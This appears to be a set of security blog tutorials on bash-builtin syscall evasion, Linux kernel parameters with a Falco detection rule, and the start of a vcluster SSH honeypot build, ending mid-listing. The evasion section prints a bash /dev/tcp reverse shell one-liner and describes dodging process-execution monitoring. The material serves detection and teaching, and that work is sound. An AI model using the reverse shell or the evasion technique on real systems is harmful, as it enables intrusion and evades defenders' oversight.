This is being done inside a single shell with not much else going on. If we tried to do this across a running system, we would see exponentially more in the brief period of time before it melted down into a puddle of flaming goo from the load. In other words, there really isn’t any reasonable way to watch all the syscall activity all the time. The best we can do is to be intentional with what we choose to monitor. 
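
strace's syscall classes can offer a middle ground between watching one syscall and watching everything. If we know it's file activity we care about, for instance, we can trace every syscall that takes a filename in one shot (still noisy, but bounded):

$ strace -f -e trace=%file bash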

Conclusion

This exploration into syscall evasion using bash shell builtins illuminates just a fraction of the creative and subtle ways in which system interactions can be manipulated to bypass security measures. Security tools that focus solely on process execution are inherently limited in scope; a more nuanced and comprehensive approach to monitoring system activity is needed to provide a better level of security.

The simple example we put together for replicating the functionality of cat dodged this entirely and allowed us to read the data from our file while flying completely under the radar of tools that were only looking for process execution. Unfortunately, this is just the tip of the iceberg. 

Using the bash builtins in a similar fashion to what we did above, we can combine them to replicate the functionality of a number of other tools and attacks. A very brief amount of Googling will turn up a well-known method for assembling a reverse shell using the bash builtins. Furthermore, we have all the various shells and all their different sets of builtins at our disposal to tinker with (we'll leave this as an exercise for the reader). 
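
The commonly cited form of that reverse shell leans on bash's built-in handling of /dev/tcp redirections and looks something like the following, where the address and port are placeholders for an attacker-controlled listener:

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1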

In the coming articles in this series, we’ll look at some other methods of syscall evasion. If you want to learn more, explore Defense evasion techniques with Falco.  

Tales from the Kernel Parameter Side

Users live in the sunlit world of what they believe to be reality. But, there is, unseen by most, an underworld. A place that is just as real, but not as brightly lit. The Kernel Parameter side (apologies to George Romero).

Kernel parameters aren't really that scary in actuality, but they can be a dark and cobweb-filled corner of the Linux world. Kernel parameters are the means by which we can pass settings to the Linux (or Unix-like) kernel to control how it behaves. By altering these parameters, we can control the behavior of quite a few different things, including memory, networking, and the filesystem, just to name a few.

There are a LOT of kernel parameters, somewhere in the vicinity of 2,000.

We may find differing parameters in the various flavors of Linux/Unix. Some of them are used or emphasized differently in specific environments, such as those we might find in the various cloud providers. In many cases, the sysctl utility, which we will discuss the use of shortly, is used to view or update these parameters. We may also find them in various parts of the filesystem, depending on the specific OS and distribution that we are working with.

Touring the kernel parameter landscape

We can find the kernel parameters stored in the filesystem as files under /proc/sys/. If we look at the directory structure here, we can see that it is extensive, relatively speaking.

Though the listing below is only two levels of directory structure deep, there are actually more directories under the ones we see here.

├── abi
├── debug
├── dev
│   ├── cdrom
│   ├── hpet
│   ├── mac_hid
│   ├── parport
│   ├── raid
│   ├── scsi
│   └── tty
├── fs
│   ├── binfmt_misc
│   ├── epoll
│   ├── fanotify
│   ├── inotify
│   ├── mqueue
│   ├── quota
│   └── verity
├── kernel
│   ├── firmware_config
│   ├── keys
│   ├── pty
│   ├── random
│   ├── seccomp
│   ├── usermodehelper
│   └── yama
├── net
│   ├── bridge
│   ├── core
│   ├── fan
│   ├── ipv4
│   ├── ipv6
│   ├── mptcp
│   ├── netfilter
│   └── unix
├── user
└── vm

If we look at the top-level structure under /proc/sys/, we can get at least a high level idea of what the different sets of parameters do:

  • abi: parameters for execution domains and personalities
  • debug: debug parameters
  • dev: parameters for devices on the system
  • fs: filesystem parameters
  • kernel: parameters for operation of the kernel
  • net: networking parameters
  • user: user namespace parameters
  • vm: memory management parameters

Each of the directories in this structure will have a set of files (or further directories) under it, one for each parameter, and each of them containing the value that the parameter in question holds. If we look at the structure under /proc/sys/dev/:

├── cdrom
│   ├── autoclose
│   ├── autoeject
│   ├── check_media
│   ├── debug
│   ├── info
│   └── lock
├── hpet
│   └── max-user-freq
├── mac_hid
│   ├── mouse_button2_keycode
│   ├── mouse_button3_keycode
│   └── mouse_button_emulation
├── parport
│   └── default
│       ├── spintime
│       └── timeslice
├── raid
│   ├── speed_limit_max
│   └── speed_limit_min
├── scsi
│   └── logging_level
└── tty
    └── ldisc_autoload

We can see that we have a cdrom directory and, beneath it, a file called autoclose. This is the dev.cdrom.autoclose kernel parameter, which we will be working with shortly.

Some of these parameters are simple binary values, as is the case with dev.cdrom.autoclose. This parameter has a value of either 1 or 0. Some may have a wide range of numeric or even string values. Others, such as dev.cdrom.info, are odd.

CD-ROM information, Id: cdrom.c 3.20 2003/12/17
drive name:		sr1	sr0
drive speed:		1	1
drive # of slots:	1	1
Can close tray:		1	1
Can open tray:		1	1
Can lock tray:		1	1
Can change speed:	1	1
Can select disk:	0	0
Can read multisession:	1	1
Can read MCN:		1	1
Reports media changed:	1	1
Can play audio:		1	1
Can write CD-R:		1	1
Can write CD-RW:	1	1
Can read DVD:		1	1
Can write DVD-R:	1	1
Can write DVD-RAM:	1	1
Can read MRW:		0	0
Can write MRW:		0	0
Can write RAM:		0	0

There is a great deal of information on the internet regarding the various kernel parameters and the impacts of changing them. One excellent resource for chasing down what a particular parameter does is Sysctl Explorer.

Working with kernel parameters

In these examples, we will be using Ubuntu 22.04 Jammy Jellyfish. Working with kernel parameters should generally be the same as the examples below on most distributions that are Debian-based, but may vary in strange and wonderful ways with others.

There are quite a few different methods that we can use to interact with kernel parameters on a live system. As with all things Linux, there is always a "one true" method for any given task, but here we'll be covering some of the more common means of doing so.

The easiest of these paths is to use the sysctl utility or to add entries in /etc/sysctl.conf. Let's try a few of these out. We'll be interacting with the dev.cdrom.autoclose parameter, as this is relatively innocuous and not even in use on many modern systems.

Viewing kernel parameters

To view a parameter and its value, we can use the sysctl utility to ask for it directly.

Sysctl is a tool specifically made to modify kernel parameters and is available on most flavors of Linux and Unix-like operating systems. In order to modify our parameter directly, we’ll need to know what the name of the parameter is in advance.

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 1

In the result returned for this, we can see that dev.cdrom.autoclose is set to 1, indicating that it is on and at its default value.

If we don’t immediately know the name of the parameter, we can get a list of all of them and their values with sysctl as well.

$ sudo sysctl -a
abi.vsyscall32 = 1
debug.exception-trace = 1
debug.kprobes-optimization = 1
dev.cdrom.autoclose = 1
<snip>

The parameter we’re working with is conveniently toward the beginning of the list, but there are a couple thousand or so parameters here. We can also, of course, just grep for what we’re looking for if we know roughly what we want.

$ sudo sysctl -a | grep cdrom
dev.cdrom.autoclose = 1
dev.cdrom.autoeject = 0
dev.cdrom.check_media = 0
dev.cdrom.debug = 0
<snip>

We can also look directly in the parameter file in the filesystem. In this case, in the file /proc/sys/dev/cdrom/autoclose.

$ cd /proc/sys/dev/cdrom
$ cat autoclose 
1

Lastly, we can check in /etc/sysctl.conf and see if there is a parameter present here. There may be nothing in the file for our parameter at all, or it may be commented out. Most systems, by default, will not have many parameters in this file and they will all be commented out.

$ cat /etc/sysctl.conf 
#
# /etc/sysctl.conf - Configuration file for setting system variables
# See /etc/sysctl.d/ for additional system variables.
# See sysctl.conf (5) for information.
#
#kernel.domainname = example.com
# Uncomment the following to stop low-level messages on console
#kernel.printk = 3 4 1 3
<snip>

Again, we can simply grep in the file for the parameter that we are looking for to see if it is present at all.

cat /etc/sysctl.conf | grep cdrom

We won’t see a return here in an unmodified system, as this parameter is not in /etc/sysctl.conf by default.

Updating kernel parameters using sysctl

We can easily edit the value of a parameter by using sysctl -w to write our desired value. This change will only persist until the next reboot of the system.

$ sudo sysctl -w dev.cdrom.autoclose=0
dev.cdrom.autoclose = 0

We can double check this change by querying the value again.

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 0

Updating kernel parameters by editing sysctl.conf

If we want to make a persistent change, we can add our parameter modification to /etc/sysctl.conf, like so.

$ sudo bash -c 'echo "dev.cdrom.autoclose = 1" >> /etc/sysctl.conf'

This is, however, not enough to accomplish the change entirely. If we check the state of the parameter now with sysctl, we will find that it has not changed.

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 0

Now, we need to load the changes from the files using sysctl -p. If we do not specify a file, sysctl will assume we want to load them from /etc/sysctl.conf, which is what we want. We can then check the parameter again and see the expected change.

$ sudo sysctl -p
$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 1
Note:
There are a few other standard locations that sysctl will look for configuration files in:

  • /etc/sysctl.d/*.conf
  • /run/sysctl.d/*.conf
  • /usr/local/lib/sysctl.d/*.conf
  • /usr/lib/sysctl.d/*.conf
  • /lib/sysctl.d/*.conf

We won't get into these here, but the man page for sysctl.d does have extensive info on how these are used.
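
For example, a persistent setting can live in its own drop-in file rather than in /etc/sysctl.conf itself (the file name below is arbitrary; the numeric prefix simply controls load order):

$ echo "dev.cdrom.autoclose = 0" | sudo tee /etc/sysctl.d/99-local.conf
dev.cdrom.autoclose = 0
$ sudo sysctl -p /etc/sysctl.d/99-local.conf
dev.cdrom.autoclose = 0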

How to fail at directly editing the files under /proc/sys/

Even though the kernel parameter settings are stored in the individual files under /proc/sys/, we generally won’t be able to edit them directly. We can open them up and view the contents just fine, but if we make a change and try to write it to the file, even as root, we’ll get a variety of error messages, depending on the particular method that we try to take to do so:

  • vi
    "autoclose" E667: Fsync failed
  • nano
    [ Error writing autoclose: Invalid argument ]
  • cat
    bash: autoclose: Permission denied

The items under /proc/ are a part of procfs, which is a virtual filesystem, so even if we were able to make changes here, they wouldn’t persist through a reboot. We can, however, watch these files for changes, which we’ll come back to shortly.

Which kernel parameters should we care about?

One of the harder issues when looking at kernel parameters is sorting out which of them we should care about. There are so many of them and such a wide range of settings that we can change.

How do we know which of these are important and which of them we should panic about when we see unexpected change?

This, as it turns out, is actually a really hard question to answer. To a certain extent, it depends on the specific OS, distribution, version, hardware, etc. that you are using. On the one hand, we might expect to rarely see any kernel parameter change in the environment, and it might be appropriate to ring the alarm bells any time we see one altered. On the other hand, we might have an environment where we see them change frequently. On some of the cloud platforms, kernel parameters are tweaked on instances for things like networking.

If we have our security measures turned up to super paranoid mode, we’re going to get a LOT of alerts – alerts which will soon be blissfully ignored because they are “always just noise,” which is clearly not desirable.

This being said, below is a non-exhaustive list of parameters that are generally considered “important.”

These should all be carefully tested before we randomly go rolling them out in a particular environment for monitoring or make any changes away from the defaults that they are set to. YMMV, IANAD (well..), etc…

  • dev.tty.ldisc_autoload: Disable loading line disciplines for unprivileged users
  • fs.protected_fifos: Disable creating files in insecure areas
  • fs.protected_hardlinks: Disable creating hardlinks for unprivileged users
  • fs.protected_regular: Disable creating files in insecure areas
  • fs.protected_symlinks: Disable creating symlinks for unprivileged users
  • fs.suid_dumpable: Disable core dumps for elevated processes
  • kernel.core_uses_pid: Add the PID to core dump file names
  • kernel.ctrl-alt-del: Disable immediate reboot on Ctrl-Alt-Del
  • kernel.deny_new_usb: Block new USB devices (hardened kernels only)
  • kernel.dmesg_restrict: Disable access to dmesg for unprivileged users
  • kernel.kexec_load_disabled: Disable kexec to prevent kernel livepatching
  • kernel.kptr_restrict: Restrict access to kernel addresses in logs
  • kernel.modules_disabled: Disable loading kernel modules
  • kernel.perf_event_paranoid: Restrict use of performance events
  • kernel.randomize_va_space: Address space randomization
  • kernel.sysrq: Harden debugging functionality
  • kernel.unprivileged_bpf_disabled: No BPF for unprivileged users
  • kernel.yama.ptrace_scope: Limit the scope of ptrace
  • net.core.bpf_jit_harden: Harden the BPF JIT compiler
  • net.ipv4.conf.all.accept_redirects: Disable ICMP redirect acceptance
  • net.ipv4.conf.all.accept_source_route: Disable source routing
  • net.ipv4.conf.all.bootp_relay: Disable BOOTP relay
  • net.ipv4.conf.all.forwarding: Disable IP forwarding
  • net.ipv4.conf.all.log_martians: Log Martian packets
  • net.ipv4.conf.all.mc_forwarding: Disable multicast routing
  • net.ipv4.conf.all.proxy_arp: Harden ARP
  • net.ipv4.conf.all.rp_filter: Source route verification
  • net.ipv4.conf.all.send_redirects: Disable ICMP redirect sending
  • net.ipv4.conf.default.accept_redirects: Disable ICMP redirect acceptance
  • net.ipv4.conf.default.accept_source_route: Disable source routing
  • net.ipv4.conf.default.log_martians: Log Martian packets
  • net.ipv4.icmp_echo_ignore_broadcasts: Ignore ICMP echo and timestamp requests from broadcasts
  • net.ipv4.icmp_ignore_bogus_error_responses: Ignore bogus ICMP responses
  • net.ipv4.tcp_syncookies: Enable syncookies
  • net.ipv4.tcp_timestamps: Protect against time-wait assassination
  • net.ipv6.conf.all.accept_redirects: Protect against man-in-the-middle attacks
  • net.ipv6.conf.all.accept_source_route: Protect against IP spoofing
  • net.ipv6.conf.default.accept_redirects: Protect against man-in-the-middle attacks
  • net.ipv6.conf.default.accept_source_route: Protect against IP spoofing
  • vm.unprivileged_userfaultfd: Protect against use-after-free exploitation

There may also be other kernel parameters which, although not immediately sensitive, might be an indication of weirdness if we see them change on a system.

A good example of this is the vm.nr_hugepages parameter. This kernel parameter changes the memory chunk allocation so that memory lookups are faster, which can increase the efficiency of a cryptocurrency miner by 15-30%. Seeing this parameter unexpectedly change on a system may be a very good indicator that someone has gifted us with a miner.
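
Since vm.nr_hugepages defaults to 0 on most stock systems, checking it is cheap (though database and virtualization hosts may legitimately run with a nonzero value):

$ sysctl vm.nr_hugepages
vm.nr_hugepages = 0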

What can the bad guys do with kernel parameters?

In short, quite a lot. Arguably, an attacker would need sufficient permissions on the system to alter the kernel parameters, or an attack that would allow them to subvert another privileged process to do so, but things can get quite a bit worse than this.

In the set of parameters we just discussed, even without digging too deeply, there are several that mitigate a variety of vulnerabilities related to network attacks. Disabling some or all of these intentionally could leave some large holes in the defenses of a system. These really aren’t the ugly parameters for an attacker to play with though.

Tales from the Kernel Parameter side

To pull one out as an example, consider kernel.kexec_load_disabled. Unsetting this parameter can allow a replacement kernel to be loaded at runtime. Not just a replacement kernel, but any kernel, potentially even loading a completely unsigned one. Once we can modify the contents of the kernel at will, we are entirely beyond the reach of any protections that might be in place in the way of anti-malware, or really much of anything else.
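
This particular parameter is worth pinning down early: on kernels built with kexec support, kernel.kexec_load_disabled is a one-way switch, so once it has been set to 1 it cannot be flipped back to 0 without a reboot.

$ sudo sysctl -w kernel.kexec_load_disabled=1
kernel.kexec_load_disabled = 1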

Attacks against or using kexec have been a staple of breaking protections on mobile devices and game consoles for years. Pulling off an attack like this might be a bit more complicated than flipping a kernel parameter in the end, but this could give attackers a nice foothold for a starting point.

Tracking changes to kernel parameters

For changes made at runtime, there are thankfully only a few places that we need to watch on our systems.

If we want to watch for general changes being made to any parameter, we can monitor the use of the sysctl tool. The two primary uses of this tool that we would care about for this purpose would be the -w switch to write a parameter and the -p switch to load a file such as /etc/sysctl.conf.

Fortunately, whenever changes to kernel parameters are implemented, the individual file pertaining to the parameter being changed under /proc/sys/ is also altered. When we make a change to dev.cdrom.autoclose, the /proc/sys/dev/cdrom/autoclose file is written. This is also something we can easily track, and it is a little more reliable than watching any one particular mechanism for making changes. We can also be a bit more specific about which parameter changes we want to watch for when we are using this mechanism.

Let’s take a look at using Falco to do just this.

Building a Falco rule to track kernel parameter changes

After installing Falco, we’ll want to make a quick change to the Falco configuration file so we can easily watch the Falco logs. We need to edit /etc/falco/falco.yaml using sudo, and change the file output to true and the filename to /var/log/falco_events.log as shown below:

file_output:
  enabled: true
  keep_alive: false
  filename: /var/log/falco_events.log

Once this is done, we’ll open /etc/falco/falco_rules.local.yaml in an editor using sudo in order to start building our rule.

We will be building a modular rule in order to make it easier to update and modify in the future, and we will implement a list and a macro in addition to the rule. Check out the Falco documentation for more information on these concepts.

First, we will add a list called sensitive_kernel_parameter_files. This list will hold the specific filenames of the parameters we want to monitor. In this case, it's /proc/sys/dev/cdrom/autoclose.

- list: sensitive_kernel_parameter_files
  items: [/proc/sys/dev/cdrom/autoclose]

Next, we'll add a macro called sensitive_kernel_parameters. In this, we will place a condition that looks for any file descriptor names that appear in the sensitive_kernel_parameter_files list we just created.

- macro: sensitive_kernel_parameters
  condition: fd.name in (sensitive_kernel_parameter_files)

Lastly, we’ll create a rule with a condition that looks for modifications to kernel parameters called Kernel Parameter Modification. The fast and easy route for the condition in this rule might look something like the following:

condition: (open_write and (fd.name startswith "/proc/sys/" or fd.name startswith "/etc/sysctl"))

In this case we would watch for writes to any files under /proc/sys/ or /etc/sysctl. This would catch any changes that got made, right? Yes, it would.

Some cloud providers may change kernel parameters on instances in order to optimize them for their particular environment. It may seem like a good idea to set up a rule like “tell me every time any kernel parameter gets changed”, but we may potentially see a great deal of noise from doing so (that’s experience talking).

Instead, let’s make a condition that is a bit more specific. In this case, we’ll watch for files being written, which have a file descriptor name appearing in our sensitive_kernel_parameter_files list.

condition: (open_write and sensitive_kernel_parameters)

The final rule will look like so:

- rule: Kernel Parameter Modification
  desc: Detect changes to sensitive kernel parameters. May be an indication of compromise.
  condition: (open_write and sensitive_kernel_parameters)
  output: >
    Sensitive kernel parameter was modified; possible unauthorized changes (user.name=%user.name user.loginuid=%user.loginuid proc.cmdline=%proc.cmdline parent=%proc.pname file=%fd.name container.id=%container.id container_name=%container.name evt.type=%evt.type evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name image=%container.image.repository:%container.image.tag)
  priority: WARNING

Finally, we need to restart the Falco service to put our updated rule into service.

sudo service falco restart
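
Once the service is back up, we can confirm that our local rules file was actually picked up by looking for the rule-loading message Falco prints at startup (this assumes a systemd-based install like the one used here):

$ sudo journalctl -u falco | grep falco_rules.local.yaml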

Testing our Falco rule

Let’s take everything for a test drive. We will want to use at least two terminals for this so we can easily keep track of everything that is going on.

First, we’ll set up a tail to follow anything that happens in the Falco log file. There will probably be some content here already from the Falco service ticking over, but we want to watch for new events being added.

In terminal 1:

tail -f /var/log/falco_events.log

Let’s first check the current state of the parameter. If we have followed all the steps above, dev.cdrom.autoclose is probably set to 1, but let’s take a peek anyway.

In terminal 2:

$ sudo sysctl dev.cdrom.autoclose
dev.cdrom.autoclose = 1

If it’s set to 0, that’s OK too. We can just reverse the sense of the command below if that’s the case. Let’s make the change:

$ sudo sysctl -w dev.cdrom.autoclose=0
dev.cdrom.autoclose = 0

In our tail of the Falco log in terminal 1, we should see the output of our kernel parameter change rule. Success!

11:19:22.673413934: Warning Kernel parameter was modified; possible unauthorized changes (user.name=root user.loginuid=1000 proc.cmdline=sysctl -w dev.cdrom.autoclose=0 parent=sudo file=/proc/sys/dev/cdrom/autoclose container.id=host container_name=host evt.type=openat evt.res=SUCCESS proc.pid=1447007 proc.cwd=/proc/sys/dev/cdrom/ proc.ppid=1447006 proc.pcmdline=sudo sysctl -w dev.cdrom.autoclose=0 proc.sid=5067 proc.exepath=/usr/sbin/sysctl user.uid=0 user.loginname=user group.gid=8390047166231478272 group.name=root image=<NA>:<NA>)

To expand what we have done here, we can go back and easily add whichever parameters we want to watch for modification to the sensitive_kernel_parameter_files list. We just need to know where in the filesystem the parameter lives in order to add it to the list.
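
For example, to also watch the ptrace scope and hugepages parameters discussed earlier, the list might grow to something like this (paths follow the usual dotted-name-to-path mapping):

- list: sensitive_kernel_parameter_files
  items: [/proc/sys/dev/cdrom/autoclose, /proc/sys/kernel/yama/ptrace_scope, /proc/sys/vm/nr_hugepages]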

Conclusion

Kernel parameters can be a bit scary at first glance, but are less intimidating than they appear to be once we get a bit better understanding of how they are structured and how they function. Once we have an idea of what the different sections of the directory structure under /proc/sys/ do, it becomes considerably easier to track down parameters and understand their purpose.

Armed with knowledge about what these parameters are and how we can interact with them, we can work on putting them to use in strengthening the security of our systems. Once we understand which points to watch for kernel parameter changes, we can also help protect ourselves from the impact of unexpected changes.

Falco can alert us about the modification of specific, sensitive parameters, avoiding the massive noise that alerting on every change would cause.


If you would like to find out more about Falco, the Falco documentation is a great place to start.

Building honeypots with vcluster and Falco: Episode I

Honeypots are, at a high level, mechanisms for luring attackers in order to distract them from legitimate access or to gather intelligence on their activities. We’re going to build a small example here of a honeypot using vcluster and Falco.

In this first episode, we explain how to build a simple SSH honeypot using vcluster and Falco for runtime intrusion detection.

Why honeypots?

Honeypots can be modeled on almost any type of digital asset, including applications, systems, networks, IoT devices, SCADA components, and a wide range of others. They can range in complexity, from honeytokens representing instrumented single files to honeynets representing sprawling networks of multiple systems and infrastructure.

Honeypots are of great utility for intelligence collection, as they can allow blue teams and security researchers a window into the tools, techniques, and procedures (TTPs) of attackers, as well as provide information as the basis for Indicators of Compromise (IoCs) to feed to various security tools.

One of the ways we can classify honeypots is by their level of interaction: high interaction and low interaction.

High interaction vs. Low interaction honeypots

Low interaction honeypots are the duck decoy of the honeypot world. They don’t take a lot of resources to run, but they generally don’t stand up to close examination. They may do something simple like respond with a relatively realistic banner message on a standard port, but this is usually about the extent of what they can do. This may briefly interest an attacker when showing up on a port and service scan, but the lack of response otherwise likely won’t keep them interested for long. Additionally, low interaction honeypots don’t give us much of a view into what the attacker is doing, as they don’t provide a great deal of an attack surface for them to actually interact with.

If low interaction honeypots are a duck decoy, then high interaction honeypots are actual ducks. While this is much better for luring attackers in, we might lose our duck. High interaction honeypots are often composed of real systems running real applications, and are instrumented to keep close track of what an attacker is doing. This can allow us to see the full length of more complex activities, such as chained exploits, as well as obtain copies of tools and binaries uploaded, credentials used, etc. While these are great from an intelligence gathering perspective, we have also just put an actual asset directly in the hands of an attacker and need to carefully monitor what they are doing with it.

One of the primary challenges with high interaction honeypots is in keeping the attacker isolated from the rest of the environment. In the case of honeypots built using containerization tools such as Kubernetes, we have to carefully keep the attacker away from the portions of the cluster actually running the honeypot and the associated instrumentation for monitoring and maintaining it. This can be challenging and can also force us to limit what we can expose for attackers to access. Anything an attacker could use to target the cluster itself or the instrumentation would need to be excluded, or workarounds would have to be put in place to prevent unwanted tampering from happening.

Virtual clusters to the rescue

Virtual clusters are Kubernetes clusters running on top of the host Kubernetes cluster. We can run multiple virtual clusters, each in its own separate environment and unable to reach the other virtual clusters or the host cluster.

Since the virtual cluster is running inside of its own isolated space, this allows us to expose very sensitive items inside them, as attackers aren’t seeing the “real” equivalents running on the host cluster. In this way, we can expose elements of the Kubernetes infrastructure, maintenance tools, and other such items without having to worry about attackers taking down the honeypot itself.

What is a vcluster – Architecture

There are several virtual cluster projects we could use for this, but vcluster is currently the most polished and well-supported. The vcluster folks are very friendly and helpful, be sure to stop in and say hi to them on their Slack!

Let’s build a vcluster honeypot

We're going to build a small example of a honeypot using vcluster. This is an intentionally simple example, but it will provide us with a good foundation to build on for any future tinkering we might want to do.

We need tools with the following minimum versions to achieve this demo:

  • Minikube v1.26.1
  • Helm v3.9.2
  • kubectl v1.25.0
  • vcluster 0.11.2

Step-by-step installation of a vcluster honeypot and Falco

First, we’ll install the vcluster binary, a very simple task.

$ curl -s -L "https://github.com/loft-sh/vcluster/releases/latest" | sed -nE 's!.*"([^"]*vcluster-linux-amd64)".*!https://github.com\1!p' | xargs -n 1 curl -L -o vcluster && chmod +x vcluster;
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 36.8M  100 36.8M    0     0  10.4M      0  0:00:03  0:00:03 --:--:-- 11.2M
$ sudo mv vcluster /usr/local/bin;
$ vcluster version
vcluster version 0.11.2

Provision a local Kubernetes cluster

There are a wide variety of ways to provision a Kubernetes cluster. In this particular example, we will be using minikube.

Note: For our purposes here, we can use the virtualbox, qemu, or kvm2 driver for minikube, but not the none driver. Falco will fail to deploy its driver correctly later on if we try to use none. Additionally, since we’re using the virtualbox driver, we need to deploy this on actual hardware. This will not work inside of a VM, on an EC2 instance, etc.

Let’s provision a cluster. After we run the start command, minikube will run for a minute or two while it builds everything for us.

$ minikube start --vm-driver=virtualbox
😄  minikube v1.26.1 on Ubuntu 22.04
✨  Using the virtualbox driver based on user configuration
👍  Starting control plane node minikube in cluster minikube
🔥  Creating virtualbox VM (CPUs=2, Memory=6000MB, Disk=20000MB) ...
🐳  Preparing Kubernetes v1.24.3 on Docker 20.10.17 ...
    ▪ Generating certificates and keys ...
    ▪ Booting up control plane ...
    ▪ Configuring RBAC rules ...
    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
🔎  Verifying Kubernetes components...
🌟  Enabled addons: storage-provisioner
🏄  Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default

Instrumenting our honeypot with Falco

Next, we need to install Falco:

$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
Update Complete. ⎈Happy Helming!⎈
$ helm upgrade --install falco --set driver.loader.initContainer.image.tag=master --set driver.loader.initContainer.env.DRIVER_VERSION="2.0.0+driver" --set tty=true --namespace falco --create-namespace falcosecurity/falco
Release "falco" does not exist. Installing it now.
NAME: falco
LAST DEPLOYED: Thu Sep  8 15:32:45 2022
NAMESPACE: falco
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.
No further action should be required.
Tip: 
You can easily forward Falco events to Slack, Kafka, AWS Lambda and more with falcosidekick. 
Full list of outputs: https://github.com/falcosecurity/charts/tree/master/falcosidekick.
You can enable its deployment with `--set falcosidekick.enabled=true` or in your values.yaml. 
See: https://github.com/falcosecurity/charts/blob/master/falcosidekick/values.yaml for configuration values.

The falco pod will take a minute or so to spin up. We can use kubectl to check the status of it and have a look at the logs to make sure everything went smoothly:

$ kubectl get pods -n falco -o wide
NAME          READY   STATUS    RESTARTS   AGE   IP           NODE       NOMINATED NODE   READINESS GATES
falco-zwfcj   1/1     Running   0          73s   172.17.0.3   minikube   <none>           <none>
$ kubectl logs falco-zwfcj -n falco
Defaulted container "falco" out of: falco, falco-driver-loader (init)
Thu Sep  8 22:32:47 2022: Falco version 0.32.2
Thu Sep  8 22:32:47 2022: Falco initialized with configuration file /etc/falco/falco.yaml
Thu Sep  8 22:32:47 2022: Loading rules from file /etc/falco/falco_rules.yaml:
Thu Sep  8 22:32:47 2022: Loading rules from file /etc/falco/falco_rules.local.yaml:
Thu Sep  8 22:32:48 2022: Starting internal webserver, listening on port 8765

Putting everything together to create the virtual cluster

Next, we need to create a namespace in the host cluster for our vcluster to live in, then deploy the vcluster into it.

$ kubectl create namespace vcluster
namespace/vcluster created
$ vcluster create ssh -n vcluster
info   Detected local kubernetes cluster minikube. Will deploy vcluster with a NodePort & sync real nodes
info   Create vcluster ssh...
info   execute command: helm upgrade ssh https://charts.loft.sh/charts/vcluster-0.11.2.tgz --kubeconfig /tmp/3673995455 --namespace vcluster --install --repository-config='' --values /tmp/641812157
done √ Successfully created virtual cluster ssh in namespace vcluster
info   Waiting for vcluster to come up...
warn   vcluster is waiting, because vcluster pod ssh-0 has status: ContainerCreating
done √ Switched active kube context to vcluster_ssh_vcluster_minikube
- Use `vcluster disconnect` to return to your previous kube context
- Use `kubectl get namespaces` to access the vcluster

Install the SSH honeypot target

With the vcluster instantiated, we can now create an intentionally insecure ssh server inside of it to use as a target for our honeypot. This is something we touched on earlier in securing SSH on EC2.

We'll be deploying an intentionally insecure ssh server helm chart from securecodebox.io to use as a target here. The credentials for this server are root/THEPASSWORDYOUCREATED.

$ helm repo add securecodebox https://charts.securecodebox.io/
"securecodebox" has been added to your repositories
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
Update Complete. ⎈Happy Helming!⎈
$ helm install my-dummy-ssh securecodebox/dummy-ssh --version 3.14.3
NAME: my-dummy-ssh
LAST DEPLOYED: Thu Sep  8 15:53:15 2022
NAMESPACE: default
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Demo SSH Server deployed.
Note this should used for demo and test purposes.
Do not expose this to the Internet!

Examine the different contexts

Now we have something running inside our vcluster. Let’s take a look at the two different contexts we have.

Note:
A context in Kubernetes is a set of parameters defining how to access a particular cluster. Switching the context will change everything we do with commands like kubectl from one cluster to another.
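
For example, we can list the contexts kubectl currently knows about, and jump between them by name:

$ kubectl config get-contexts
$ kubectl config use-context minikube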

First, let’s look at all of the resources existing in our cluster by using the current vcluster perspective.

$ kubectl get all --all-namespaces
NAMESPACE     NAME                                READY   STATUS    RESTARTS   AGE
kube-system   pod/coredns-6ffcc6b58-h7zwx        1/1     Running   0          m26s
default       pod/my-dummy-ssh-7f98c68f95-5vwns   1/1     Running   0          m1s
NAMESPACE     NAME                   TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)                  AGE
default       service/kubernetes     ClusterIP   10.96.112.178   <none>        443/TCP                  m26s
kube-system   service/kube-dns       ClusterIP   10.97.196.120   <none>        53/UDP,53/TCP,9153/TCP   m26s
default       service/my-dummy-ssh   ClusterIP   10.99.109.0     <none>        22/TCP                   m1s
NAMESPACE     NAME                           READY   UP-TO-DATE   AVAILABLE   AGE
kube-system   deployment.apps/coredns        1/1     1            1           m26s
default       deployment.apps/my-dummy-ssh   1/1     1            1           m1s
NAMESPACE     NAME                                      DESIRED   CURRENT   READY   AGE
kube-system   replicaset.apps/coredns-6ffcc6b58        1         1         1       m26s
default       replicaset.apps/my-dummy-ssh-7f98c68f95   1         1         1       m1s

We can see the normal infrastructure for Kubernetes, as well as the pod and service for my-dummy-ssh running in the default namespace. Note that we do not see the resources for Falco, as this is installed in our host cluster and isn’t visible from within the vcluster.

Next, let’s switch contexts by disconnecting from vcluster. This will take us back to the context of the host cluster.

$ vcluster disconnect
info   Successfully disconnected from vcluster: ssh and switched back to the original context: minikube

We can now ask kubectl to show us all of the resources again, and we will see a very different picture.

$ kubectl get all --all-namespaces
NAMESPACE     NAME                                                READY   STATUS    RESTARTS   AGE
falco         pod/falco-zwfcj                                     1/1     Running   0          5m
kube-system   pod/coredns-d4b75cb6d-ttwdl                        1/1     Running   0          4m
kube-system   pod/etcd-minikube                                   1/1     Running   0          4m
